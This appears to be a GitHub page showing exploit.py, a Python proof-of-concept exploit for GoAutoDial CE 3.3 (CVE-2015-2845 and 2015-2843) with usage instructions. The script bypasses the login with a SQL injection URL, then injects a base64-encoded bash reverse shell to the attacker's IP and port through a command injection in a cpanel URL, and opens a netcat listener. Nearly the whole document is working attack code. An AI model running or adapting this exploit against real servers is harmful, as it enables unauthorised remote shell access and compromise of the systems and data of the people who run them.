-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit.py
34 lines (30 loc) · 1.17 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python3
# Exploit Title: GoAutoDial 3.3 Command Injection
# Date: 3/10/2022
# Exploit Authors: CodeX and incursi0n
# Software Link: https://www.exploit-db.com/download/36807
# Version: GoAutoDial CE 3.3-1406088000
# Tested on: kali linux 2020.1
# CVE : 2015-2845 and 2015-2843
# usage: python3 exploit.py targetip localip localport
# example: python3 exploit.py 192.168.1.11 192.168.1.10 4444
import webbrowser
import sys
import base64
import urllib.parse
import os
target = sys.argv[1]
myip = sys.argv[2]
myport = sys.argv[3]
url1 = f'https://{target}/go_login/validate_credentials/admin/\'%20OR%20\'1\'=\'1'
webbrowser.open(url1, new=2)
reverse_shell_plain = f"bash -i >& /dev/tcp/{myip}/{myport} 0>&1"
b64_shell = base64.b64encode(reverse_shell_plain.encode('utf-8'))
payload = f"|| bash -c \"eval \`echo {b64_shell.decode('ascii')} | base64 --decode\\`\""
print(f"Base64 Reverse shell: {b64_shell.decode('ascii')}")
print(f"Payload: {payload}")
final_payload = urllib.parse.quote(payload,safe='')
url2 = f"https://{target}/index.php/go_site/cpanel/" + final_payload
print("Shell trigger: " + url2)
webbrowser.open(url2, new=2)
os.system(f"rlwrap nc -nvlp {myport}")